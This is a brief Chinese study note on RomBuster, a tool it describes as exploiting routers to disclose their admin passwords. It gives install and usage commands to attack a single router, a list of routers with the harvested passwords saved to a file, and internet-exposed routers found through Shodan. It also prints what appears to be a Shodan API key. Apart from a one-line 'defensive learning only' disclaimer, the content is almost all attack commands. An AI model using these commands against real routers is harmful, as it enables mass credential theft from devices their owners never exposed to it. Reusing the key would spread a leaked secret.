【笔记】RomBuster学习笔记

前言

RomBuster is a router exploitation tool that allows to disclosure network router admin password.(Github

本文仅用于网络信息防御学习

准备工作

  • python3

安装

1
pip3 install git+https://github.com/EntySec/RomBuster

基本命令

攻击一个路由器

<ip>:路由器IP地址

1
rombuster -a <ip>

攻击多个路由器

<router>.txt:需要攻击的路由器IP地址表,每行一个IP地址
<pwd>.txt:讲输出的密码保存为文件

1
rombuster -i <router>.txt -o <pwd>.txt

攻击公网上的路由器

  • 通过Shodan搜索引擎,攻击公网上的路由器

<key>:Shodan专业版秘钥。

PSKINdQe1GyxGgecYz2191H2JoS9qvgD

1
rombuster --shodan <key>

完成

参考文献

微信公众号——白帽子左一